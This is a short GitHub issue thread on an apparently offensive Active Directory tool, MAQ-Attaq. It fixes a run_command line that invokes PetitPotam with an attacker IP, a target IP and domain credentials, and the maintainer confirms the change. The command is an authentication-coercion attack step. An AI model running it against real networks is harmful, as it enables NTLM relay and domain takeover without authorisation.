### ISSUE TITLE
Edit PetitPotam Command for proper execution 

### ISSUE THREAD

**Issue by mroa04** [SnoopJesus420/MAQ-Attaq#3]
https://github.com/SnoopJesus420/MAQ-Attaq/blob/b300bf352fb736d6576112ead2845d06fe078b0d/maq-attaq.py#L90

edit to the following: 
run_command(f"python3 {home_dir}/PetitPotam/PetitPotam.py {your_ip} {target_ip} -u {username}  -p {password}")

**Comment by SnoopJesus420** [comment]
Added the username and password fields for petitpotam, closing.
